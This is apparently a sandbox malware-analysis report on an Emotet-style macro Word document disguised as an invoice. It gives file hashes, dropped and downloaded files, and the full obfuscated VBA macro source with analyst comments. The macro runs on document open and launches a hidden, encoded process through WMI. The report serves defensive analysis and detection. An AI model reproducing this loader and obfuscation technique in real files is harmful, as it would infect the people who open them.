4c9e35f3...cccb | Files
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Downloader
Trojan
Threat Names:
Generic.EmotetU.AA5F1DE6
C2/Generic-A
Mal/HTMLGen-A
...
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\invoice D2493_392827307.doc Sample File Word Document
Malicious
Also Known As 4c9e35f3d5f555dda5f4373cf23fbb289c6067c70841be7022ba6da62e49cccbdoc (Embedded File)
Mime Type application/vnd.ms-word.document.macroEnabled.12
File Size 132.83 KB
MD5 8c809b4ac6d95ce85a0f04cd04b7a7ea Copy to Clipboard
SHA1 e82b3ab32b1b342a14ee86047689d9de1cdf1150 Copy to Clipboard
SHA256 4c9e35f3d5f555dda5f4373cf23fbb289c6067c70841be7022ba6da62e49cccb Copy to Clipboard
SSDeep 3072:3CEzuaZ9I8XO52I2DsTUyEpf/Eg22wNGdAB3It8KlRB0HO2:3CKRI2HDYUFf/XyGd230ROHN Copy to Clipboard
ImpHash None Copy to Clipboard
File Reputation Information
Severity
Blacklisted
First Seen 2020-01-29 14:02 (UTC+1)
Last Seen 2020-01-29 14:50 (UTC+1)
Names Document-Powerpoint.Trojan.Frs
Families Frs
Classification Trojan
Office Information
Revision 1
Create Time 2020-01-29 07:26:00+00:00
Modify Time 2020-01-29 07:26:00+00:00
Document Information
Application Microsoft Office Word
App Version 16.0000
Template Normal.dotm
Document Security NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 4
Character Count 25
Chars With Spaces 28
ScaleCrop False
SharedDoc False
Controls (1)
CLSID Control Name Associated Vulnerability
{6E182020-F460-11CE-9BCD-00AA00608E01} FormsFrame -
VBA Macros (4)
Macro #1: Bsswltgxsplu
Attribute VB_Name = "Bsswltgxsplu"
Attribute VB_Base = "0{072D1825-9688-400E-BC4F-1D646CDCD038}{01180EF4-9887-44F9-80DC-8E060199E35B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Decoy routine: only emits a debug string. nswww is not declared anywhere in
' this listing (an undeclared name in VBA is an Empty Variant), and nothing in
' the listing calls Pkhypyfag; the Document_open handler calls Cbokboildamo only.
Sub Pkhypyfag()
Debug.Print "dhhhhhee" + nswww + "opendb"
End Sub
Macro #2: Iizgszjgq
Attribute VB_Name = "Iizgszjgq"
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Zwdzjjxdak()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Yysnpzdbkxhwf()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Ibtakvpywi()
Const sss = 234
End Sub
' Main routine, called from Document_open (Macro #3).
'
' Structure: every effective statement is preceded by a block of 20 junk
' assignments (jdh3k2n, a, dddd, mxnby, ... ojbd) whose values are never read.
' Each junk line reads only a literal or a name that is declared nowhere in
' this listing (an Empty Variant), so the blocks have no side effects; they
' exist to inflate the module and defeat naive signatures. The effective
' statements, in order, are:
'   1. Ijtjnryyzgqx  - a string whose literal fragments are separated by the
'      delimiter "/=e^^hjbj//e===^@%%", plus ChrW(wdKeyS) (a Word WdKey
'      enumeration constant, used to produce one letter without a string
'      literal) and a member of Pfaaatpp (presumably the user form that owns
'      the FormsFrame control listed above; it is not in this listing).
'   2. Tbqtyyjexmh   - the same string with the delimiter removed (Dwzbcixzw).
'   3. Yczftylgkzmtu - GetObject on that cleaned string, i.e. the string is
'      used as an automation moniker.
'   4.-6. Ztsupycatezdd / Ckoseecn / Hhxpnqml - a second string built from
'      the cleaned moniker, ChrW(wdKeyS), two control Tag values and the
'      same Pfaaatpp member as in step 1.
'   7. Do While ... .Create(...) - calls Create on the object from step 3 with
'      the string returned by Knfygoqlxt as first argument and the object
'      returned by Pvjuxusqp(Hhxpnqml) as third argument; the remaining
'      arguments are undeclared names. The loop repeats the call while its
'      return value is nonzero.
' NOTE(review): the fully decoded moniker and command line are not on this
' page (parts live in form-control properties); the visible fragments suggest
' a WMI process-creation object, which would make the child process appear
' under the WMI provider host rather than under WINWORD - confirm against the
' sandbox process tree before building detections on the parent/child pair.
Function Cbokboildamo()
' Junk block (20 dead assignments, no side effects); repeated below with
' fresh identifiers before every effective statement.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Dehwcbks)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 989
oeu4n = Vwcxzbeytmkyp
wkid = "pizdec"
dwewr = Ehhbdzxayqeqv
oiwnb = (Jesagfpnlrr)
p3nb = (261)
i1 = (Osfowwytcrfyy)
o0Gukiqccf = (Euotwjmuzmf)
u3 = (280) + p3nb
b7 = (Uzjxgnnbiil)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (734)
mbdu = Gioulmzarbj
bxvs = 175
ojbd = "pizdec" + iwh3
' Step 1: delimiter-padded moniker string (see header comment).
Ijtjnryyzgqx = "/=e^^hjbj//e===^@%%w/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%i/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%nmg/=e^^hjbj//e===^@%%mt/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%" + ChrW(Int(wdKeyS)) + "/=e^^hjbj//e===^@%%:w/=e^^hjbj//e===^@%%in/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%3/=e^^hjbj//e===^@%%2_" + Pfaaatpp.Rxlnceqmy + "ro/=e^^hjbj//e===^@%%ce/=e^^hjbj//e===^@%%/=e^^hjbj//e===^@%%s/=e^^hjbj//e===^@%%s"
' Junk block.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Xplydchi)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 258
oeu4n = Zbeyrphdwc
wkid = "pizdec"
dwewr = Hthlwjcs
oiwnb = (Rlbdyggmg)
p3nb = (242)
i1 = (Xwksruxhwyj)
o0Hrrrgygawtjtw = (Awjwlnkwwte)
u3 = (991) + p3nb
b7 = (Krhivfvgp)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (568)
mbdu = Hwnbdbyvh
bxvs = 507
ojbd = "pizdec" + iwh3
' Step 2: strip the delimiter.
Tbqtyyjexmh = Dwzbcixzw(Ijtjnryyzgqx)
' Junk block.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Jahwbnij)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 159
oeu4n = Ntplkztukv
wkid = "pizdec"
dwewr = Zmgugdbdl
oiwnb = (Ccmljfglqt)
p3nb = (534)
i1 = (Xfrbbcytwe)
o0Vphhfhsz = (Mjxnjpekg)
u3 = (733) + p3nb
b7 = (Ajoocabnupyy)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (358)
mbdu = Uyzfiahlpsh
bxvs = 584
ojbd = "pizdec" + iwh3
' Step 3: bind to the object named by the cleaned moniker.
Set Yczftylgkzmtu = GetObject(Tbqtyyjexmh)
' Junk block.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Ybvdnivrlf)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 844
oeu4n = Luwzccpa
wkid = "pizdec"
dwewr = Yhznfjpsjncg
oiwnb = (Eclxsfzzy)
p3nb = (757)
i1 = (Frpbgnbdddoda)
o0Cswicfjqua = (Hcvyiuqzszrc)
u3 = (44) + p3nb
b7 = (Dhcqylug)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (306)
mbdu = Cqdrwavbp
bxvs = 173
ojbd = "pizdec" + iwh3
' Step 4: Tag property of a Pfaaatpp control (form not in this listing).
Ztsupycatezdd = Pfaaatpp.Qohkbjqrbijj.Tag
' Junk block.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Imkpkielqcfoz)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 85
oeu4n = Yyrskbtcfhp
wkid = "pizdec"
dwewr = Znguedlvcbaqx
oiwnb = (Eyfavbunmmdx)
p3nb = (50)
i1 = (Eiupimcwkk)
o0Tvwrbnnyygbp = (Fatiafwlysfb)
u3 = (370) + p3nb
b7 = (Siovdahz)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (648)
mbdu = Kpkplyhfrngc
bxvs = 913
ojbd = "pizdec" + iwh3
' Step 5: second string = cleaned moniker + ChrW(wdKeyS) + another Tag + step 4.
Ckoseecn = Tbqtyyjexmh + ChrW(Int(wdKeyS)) + Pfaaatpp.Wgxksnmqb.Tag + Ztsupycatezdd
' Junk block.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Txcjnrmt)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 994
oeu4n = Wuufukziwznx
wkid = "pizdec"
dwewr = Pextbclgzwy
oiwnb = (Vggityest)
p3nb = (700)
i1 = (Bvuajqmvcoui)
o0Schpuxhdcdcp = (Zqvwffrfhlxj)
u3 = (872) + p3nb
b7 = (Otbxmqbv)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (476)
mbdu = Yckysqxt
bxvs = 760
ojbd = "pizdec" + iwh3
' Step 6: append the same Pfaaatpp member used in step 1.
Hhxpnqml = Ckoseecn + Pfaaatpp.Rxlnceqmy
' Junk block.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Jxbtbipwrw)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 864
oeu4n = Hyzojkouqbtr
wkid = "pizdec"
dwewr = Xvbpbrclc
oiwnb = (Qecogblysgleo)
p3nb = (664)
i1 = (Wywhekgu)
o0Vbutswvnqtfl = (Ahsubmrmfy)
u3 = (451) + p3nb
b7 = (Ouhokkru)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (750)
mbdu = Qeajpqyqxksnh
bxvs = 920
ojbd = "pizdec" + iwh3
' Step 7: Create on the bound object. njkdsj is undeclared here (contributes
' nothing visible); Knfygoqlxt supplies the first argument; Pvjuxusqp(Hhxpnqml)
' supplies the third. The loop body is empty: Create is simply re-invoked while
' its return value is nonzero.
Do While Yczftylgkzmtu. _
Create(njkdsj & Knfygoqlxt, Utuyxaewtgot, Pvjuxusqp(Hhxpnqml), Ibbpgtqwoc, Ocjavfgejh, Jvavtbmaaynow)
Loop
' Junk block (trailing; no effect on the return value, which is never set).
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Iyvdmfftgosq)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 839
oeu4n = Xuivbqqvxpptk
wkid = "pizdec"
dwewr = Kmsmbxyrauhol
oiwnb = (Hcmyzmzugyb)
p3nb = (722)
i1 = (Fosvxxvc)
o0Hazdhbuc = (Himhmjklsmo)
u3 = (894) + p3nb
b7 = (Xlmbmroinh)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (65)
mbdu = Xzirtlww
bxvs = 439
ojbd = "pizdec" + iwh3
End Function
' Returns the automation object named by the moniker string Skqovwnhug (the
' Hhxpnqml string built in Cbokboildamo) after setting its showwindow property.
' Both addends of the showwindow value are names declared nowhere in this
' listing, so the assigned value is presumably 0 (Empty + Empty) - TODO confirm.
' NOTE(review): the object is passed as Create's third argument in
' Cbokboildamo; a zero ShowWindow on a process-startup object would request a
' hidden window, which matters for analysts looking for a visible console.
' The junk-assignment blocks are the same dead padding as in Cbokboildamo.
Function Pvjuxusqp(Skqovwnhug)
' Junk block (no side effects).
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Gchillxfygw)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 351
oeu4n = Rwhlypgsh
wkid = "pizdec"
dwewr = Fbnljydrdip
oiwnb = (Ktatfnri)
p3nb = (152)
i1 = (Loctjzdyypq)
o0Ylwacfxxck = (Epmmuvhf)
u3 = (857) + p3nb
b7 = (Xgetsajq)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (726)
mbdu = Hjcijnodds
bxvs = 218
ojbd = "pizdec" + iwh3
' Bind to the object named by the argument; this is also the return value.
Set Pvjuxusqp = GetObject(Skqovwnhug)
' Junk block.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Ijgikoanvmue)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 381
oeu4n = Cmypooypcb
wkid = "pizdec"
dwewr = Jlnuoxdirbp
oiwnb = (Imqzvjpwxrrob)
p3nb = (870)
i1 = (Tshfhwfpzbxxb)
o0Awuqgbhqhsmq = (Vgnneozukvcd)
u3 = (470) + p3nb
b7 = (Xxmovdrvtke)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (807)
mbdu = Camvftwdvk
bxvs = 242
ojbd = "pizdec" + iwh3
' Set showwindow on the returned object (value discussed in header comment).
Pvjuxusqp. _
showwindow = Qexerrnl + Skimvcalbgl
' Junk block (trailing).
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Dlyhjufaczj)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 929
oeu4n = Wehpruucrzkb
wkid = "pizdec"
dwewr = Bubcmhxugvv
oiwnb = (Qcdlqsvwbzyp)
p3nb = (398)
i1 = (Ommnfxfegb)
o0Rybxmuxzdznnt = (Szvcmuxiith)
u3 = (111) + p3nb
b7 = (Pmwcotbxudmdr)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (743)
mbdu = Ozzuwgmel
bxvs = 600
ojbd = "pizdec" + iwh3
End Function
' Deobfuscation helper: returns Ybkvjdreunbs with every occurrence of the
' delimiter "/=e^^hjbj//e===^@%%" deleted (Split on the delimiter, Join with
' an empty separator - equivalent to a Replace with ""). Called on the moniker
' string in Cbokboildamo and on the command string in Knfygoqlxt. The
' delimiter literal appears verbatim here and in Cbokboildamo, which makes it
' a usable static-detection anchor for this sample.
' The junk-assignment blocks are the same dead padding as in Cbokboildamo.
Function Dwzbcixzw(Ybkvjdreunbs)
' Junk block (no side effects).
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Nzhfoqgm)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 343
oeu4n = Qnfzhsigkpc
wkid = "pizdec"
dwewr = Dzleampqyh
oiwnb = (Jlafttyggjmy)
p3nb = (235)
i1 = (Qmnioyvmdgdm)
o0Azsgweygharwe = (Tnmihwdcq)
u3 = (377) + p3nb
b7 = (Zwhubgnzfg)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (735)
mbdu = Crvjfmqru
bxvs = 672
ojbd = "pizdec" + iwh3
' The only effective statement: remove every delimiter occurrence.
Dwzbcixzw = Join(Split(Ybkvjdreunbs, "/=e^^hjbj//e===^@%%"), "")
' Junk block (trailing).
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Frcfctsankqp)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 963
oeu4n = Chjbmgvwjjh
wkid = "pizdec"
dwewr = Pheouwpivmtfj
oiwnb = (Bzkvmsqboqai)
p3nb = (104)
i1 = (Htydvctjww)
o0Hguqwdnauj = (Mfzgqxuoty)
u3 = (182) + p3nb
b7 = (Ubnqbsdnczlj)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (753)
mbdu = Twuvoyunqqdms
bxvs = 323
ojbd = "pizdec" + iwh3
End Function
' Builds the string that Cbokboildamo passes as the first argument of Create.
' Effective statements, in order:
'   1. Nfmmtykebqti - one character from ChrW(x + wdKeyP + y); x and y are
'      declared nowhere in this listing (Empty), so the argument is presumably
'      the WdKey constant wdKeyP alone - TODO confirm.
'   2. Vacsjtbog    - that character + a Pfaaatpp form member + the literal "-e ".
'   3. dse          - the ControlTipText of a Pfaaatpp control; the bulk of the
'      command apparently lives in that property and is not on this page.
'   4. return value - Vacsjtbog + StrReverse(dse), with the delimiter removed
'      by Dwzbcixzw.
' NOTE(review): the "-e " literal followed by a reversed string stored in a
' form-control tooltip suggests an encoded-command argument; command-line
' logging of the child process is the place to confirm what it decodes to.
' The junk-assignment blocks are the same dead padding as in Cbokboildamo.
Function Knfygoqlxt()
' Junk block (no side effects).
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Ciaybzifmkf)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 27
oeu4n = Npnmlhpi
wkid = "pizdec"
dwewr = Fprjqnptydol
oiwnb = (Mietuyxlkvdp)
p3nb = (166)
i1 = (Prjhjmvjkp)
o0Wqhkmbovaddv = (Xufwgbjheguh)
u3 = (561) + p3nb
b7 = (Wcxoacbhezj)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (345)
mbdu = Ihmnntoo
bxvs = 683
ojbd = "pizdec" + iwh3
' Step 1: leading character derived from wdKeyP (see header comment).
Nfmmtykebqti = ChrW(Dnpgkqpvepdq + wdKeyP + Dxiwjyhaqe)
' Junk block.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Petblzhcrjvb)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 657
oeu4n = Mqaikjqf
wkid = "pizdec"
dwewr = Dzctartbimt
oiwnb = (Zqzogujltovv)
p3nb = (598)
i1 = (Hebdjofymxocz)
o0Tkhaxarluklh = (Khxmrlwgjk)
u3 = (307) + p3nb
b7 = (Becaeutrado)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (156)
mbdu = Yqtgtyhdobq
bxvs = 894
ojbd = "pizdec" + iwh3
' Step 2: prefix + form member + "-e ".
Vacsjtbog = Nfmmtykebqti + Pfaaatpp.Wvvfsmiwbnqmx + "-e "
' Junk block.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Uvxgazphgem)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 425
oeu4n = Bwevchnvfbv
wkid = "pizdec"
dwewr = Akgpkeaiqvfrp
oiwnb = (Ucnhyglfzao)
p3nb = (287)
i1 = (Toucpbzearth)
o0Kbzdmkwbd = (Ssofgovefob)
u3 = (583) + p3nb
b7 = (Boxmtktz)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (888)
mbdu = Aeawbpyr
bxvs = 318
ojbd = "pizdec" + iwh3
' Step 3: payload text read from a form-control tooltip (form not in listing).
dse = Pfaaatpp.Phvfxtrlqsu.ControlTipText
' Junk block.
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Tnyfmupnnk)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 383
oeu4n = Gmszwuxlapag
wkid = "pizdec"
dwewr = Qlcbmpmcm
oiwnb = (Cxccokypglhm)
p3nb = (117)
i1 = (Hyfmdmsp)
o0Dkmxgeea = (Uxvilfcqj)
u3 = (910) + p3nb
b7 = (Yhafqhpjsb)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (32)
mbdu = Yzdxajbggzpg
bxvs = 925
ojbd = "pizdec" + iwh3
' Step 4: reverse the tooltip text, append it, strip the delimiter, return.
Knfygoqlxt = Dwzbcixzw(Vacsjtbog + StrReverse(dse))
' Junk block (trailing).
   jdh3k2n = _
"pizdec"
a = "pizdec" + jdh3k2n
dddd = (Zmwhuphu)
mxnby = "pizdec" + dddd + jdh3k2n
mxnbs = 711
oeu4n = Yeivmnovlspp
wkid = "pizdec"
dwewr = Eynoyjvqhtr
oiwnb = (Dwhttfkqas)
p3nb = (959)
i1 = (Ctzhuojbh)
o0Btvmzhwoehdlz = (Wkzydgsiwpwin)
u3 = (85) + p3nb
b7 = (Dcaafaxsl)
nn3 = _
 ("pizdec")
iwh3 = "pizdec"
nbsv = (345)
mbdu = Dqyyizdv
bxvs = 988
ojbd = "pizdec" + iwh3
End Function
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Vmcuaqxjt()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Kdvmsovf()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Rxntkbtmdwls()
Const sss = 234
End Sub

Macro #3: Nqukletjuo
Attribute VB_Name = "Nqukletjuo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Hvroaczehj()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Dlrkxkkhldanp()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Oejcwvfxa()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Swtaopbb()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Evwjmsxe()
Const sss = 234
End Sub
' Auto-execution entry point: Word runs this handler when the document is
' opened (this module is bound to ThisDocument, see VB_Base above). The Const
' is filler; the only action is the call into Cbokboildamo in Macro #2, which
' is the sole path from document open to the Create call.
Private Sub Document_open()
Const sss = 234
Call Cbokboildamo
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Yoxlzyhi()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Oqwvsnokokmnx()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Imsjchsfjd()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Haqityppnzbry()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Qlrlrwbqlp()
Const sss = 234
End Sub
' Decoy: declares an unused local constant and does nothing else (padding).
Sub Qvlmsppg()
Const sss = 234
End Sub
Macro #4: Wgozpnam
Attribute VB_Name = "Wgozpnam"
Attribute VB_Base = "0{10F21615-7B11-4C29-9192-2AEF3B3250A7}{F694B320-4008-4239-A8EC-DB0FFF5A89CA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Decoy routine, identical in body to Pkhypyfag in Macro #1: emits a debug
' string built with the undeclared name nswww (Empty). Nothing in this listing
' calls it.
Sub Cipunklo()
Debug.Print "dhhhhhee" + nswww + "opendb"
End Sub
c:\users\aetadzjz\appdata\local\temp\~df8c6df2f3e5e3458f.tmp Dropped File Stream
Whitelisted
Also Known As c:\users\aetadzjz\appdata\local\temp\~df31df9286212b3e41.tmp (Dropped File)
Mime Type application/octet-stream
File Size 512 Bytes
MD5 bf619eac0cdf3f68d496ea9344137e8b Copy to Clipboard
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 Copy to Clipboard
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash None Copy to Clipboard
File Reputation Information
Severity
Whitelisted
First Seen 2011-07-06 01:20 (UTC+2)
Last Seen 2019-12-06 01:08 (UTC+1)
c:\users\aetadzjz\appdata\local\temp\~dfa7059dbfe0abfdcb.tmp Dropped File Stream
Whitelisted
Mime Type application/octet-stream
File Size 16.00 KB
MD5 ce338fe6899778aacfc28414f2d9498b Copy to Clipboard
SHA1 897256b6709e1a4da9daba92b6bde39ccfccd8c1 Copy to Clipboard
SHA256 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash None Copy to Clipboard
File Reputation Information
Severity
Whitelisted
First Seen 2011-07-06 05:09 (UTC+2)
Last Seen 2019-07-10 09:30 (UTC+2)
c:\users\aetadzjz\appdata\local\temp\~df7efad6c3c7baeda2.tmp Dropped File Stream
Whitelisted
Mime Type application/octet-stream
File Size 32.00 KB
MD5 bb7df04e1b0a2570657527a7e108ae23 Copy to Clipboard
SHA1 5188431849b4613152fd7bdba6a3ff0a4fd6424b Copy to Clipboard
SHA256 c35020473aed1b4642cd726cad727b63fff2824ad68cedd7ffb73c7cbd890479 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash None Copy to Clipboard
File Reputation Information
Severity
Whitelisted
First Seen 2011-06-11 22:08 (UTC+2)
Last Seen 2019-10-31 16:43 (UTC+1)
c:\users\aetadzjz\appdata\local\temp\vbe\msforms.exd Dropped File Stream
Unknown
Mime Type application/octet-stream
File Size 148.49 KB
MD5 ec6538a01c05e7e32ed465e6ca0b8ef3 Copy to Clipboard
SHA1 64292009e83580f7f779732a1d2f920fd7625120 Copy to Clipboard
SHA256 b0b20a8ef6e7b62ace40e2e74f5a21b0a20962f4e78f948607508f084040c57c Copy to Clipboard
SSDeep 1536:fmiIfzolWWpFpKKHAeedydBu4HTbTuo+o5aQxJudUl9yhQL3ow:fWc8WpFpKKHHedydDeo+oQLUlPow Copy to Clipboard
ImpHash None Copy to Clipboard
c:\users\aetadzjz\appdata\local\temp\~df2f22b74dd208dd11.tmp Dropped File Unknown
Unknown
Mime Type application/CDFV2
File Size 16.50 KB
MD5 cfd23da20f16e608d248602fc974aa02 Copy to Clipboard
SHA1 6f3a295bdf0405e67477ffb24fe9b2f621297088 Copy to Clipboard
SHA256 0c9b615081c9a9e1aece6a0bb07926a2d4d78a42984bac6aa443b535603a79e8 Copy to Clipboard
SSDeep 192:hsL0wNxW5P6OASi++kutZ+vRzqIvqOxjb/JVXYRxdOT4qxbbyOvctrjrFMlsnMRg:moFd5zpS3Qh86BJ10Lp Copy to Clipboard
ImpHash None Copy to Clipboard
C:\Users\aETAdzjz\AppData\Local\sendduck\sendduck.exe Downloaded File Binary
Unknown
Also Known As C:\Users\aETAdzjz\602.exe (Downloaded File)
yw9kvtprna55.exe (Embedded File)
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 532.04 KB
MD5 fe8341174cef34aa61be2be6fde0fe66 Copy to Clipboard
SHA1 f5541a16cd8ba86ab6624527a477c5bcbc3e2b4f Copy to Clipboard
SHA256 066432a51e70e12075454ee30f9160d7a278ba1b496005610711237cbf539e6a Copy to Clipboard
SSDeep 12288:y/W+p2+5oxoeg7pGy315ie+7IVmYPwy5dAyDxgR:+W+55yq7X31m7qldAIx Copy to Clipboard
ImpHash None Copy to Clipboard
3d70ce95eb1eb78620cc57fe1a6a479e6f2d70508bf813238e573863df000d6e Downloaded File Text
Unknown
Parent File analysis.pcap
Mime Type text/html
File Size 2.40 KB
MD5 e53fdf76753edcd8773ab17ae968bfd6 Copy to Clipboard
SHA1 4bea38cd83442080bdf51cd1db206715f9198955 Copy to Clipboard
SHA256 3d70ce95eb1eb78620cc57fe1a6a479e6f2d70508bf813238e573863df000d6e Copy to Clipboard
SSDeep 48:HTr+ulzMhjTgBLkJ7VKhnAzjtM48vwKgLzSNPhzSku:zr+ulgjsBwJ7VKhKMYxLiPh+ku Copy to Clipboard
ImpHash None Copy to Clipboard
Embedded URLs (2)
URL First Seen Categories Threat Names Reputation Status WHOIS Data
https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css - - -
Unknown
Not Queried
https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i - - -
Unknown
Not Queried
vbaProject.bin Embedded File Unknown
Unknown
Parent File C:\Users\aETAdzjz\Desktop\invoice D2493_392827307.doc
Mime Type application/CDFV2
File Size 68.50 KB
MD5 ec537f5304e48b82392c9cfb8cab4196 Copy to Clipboard
SHA1 ffefbe93db4909e0e57b22bd9a49e7269376d589 Copy to Clipboard
SHA256 11370bd6c67c5b2c93fead866566e4508ed21bbf675dd3bc8060c8ad6d7fb144 Copy to Clipboard
SSDeep 768:9XQ31O4QS301ItJ85KDo8Bwab9Tb0aAjgnDFUoMGBYhtbcbqrcwsFddp3pxI:xsc4QapJ85B8lRAjqxM08FwqowInlXI Copy to Clipboard
ImpHash None Copy to Clipboard
image1.jpeg Embedded File Image
Unknown
Parent File C:\Users\aETAdzjz\Desktop\invoice D2493_392827307.doc
Mime Type image/jpeg
File Size 94.01 KB
MD5 dbc43ff82d84c90b615e0490a3180a41 Copy to Clipboard
SHA1 1519ababceb0b8712b5e0d371dfc84a13b2c3292 Copy to Clipboard
SHA256 42b400ef49aec2fcad8bccaa70b530d30d803cd29ced2639245050a3d0810854 Copy to Clipboard
SSDeep 1536:UYZUiSCB52Ipmo0B1s6dkyKF+1TkU8DAMPmbjZAif/mhCZ3G2wFplGRUwDyTTB36:MXO52I2DsTUyEpf/Eg22wNGdAB3It8KR Copy to Clipboard
ImpHash None Copy to Clipboard
settings.xml Embedded File Text
Unknown
Parent File C:\Users\aETAdzjz\Desktop\invoice D2493_392827307.doc
Mime Type text/xml
File Size 2.95 KB
MD5 f77a4415f51ecf9d55723ceaa89728ef Copy to Clipboard
SHA1 bd16afb9d4bff156f8e9d0c54877ea5a54dcdb92 Copy to Clipboard
SHA256 c5b242b1270d1c06384f6497ab773ccace8fed8d416deef5604ae477be84f8ab Copy to Clipboard
SSDeep 48:ciec6mNYYNEbliS+B1+6+T+y4+2+kCpb1AloM+lqM+IyM+wM+wM+obqM+3OAayVQ:+c6mmY+bliSwH2OxNspAlNExbuEvnrTR Copy to Clipboard
ImpHash None Copy to Clipboard
document.xml Embedded File Text
Unknown
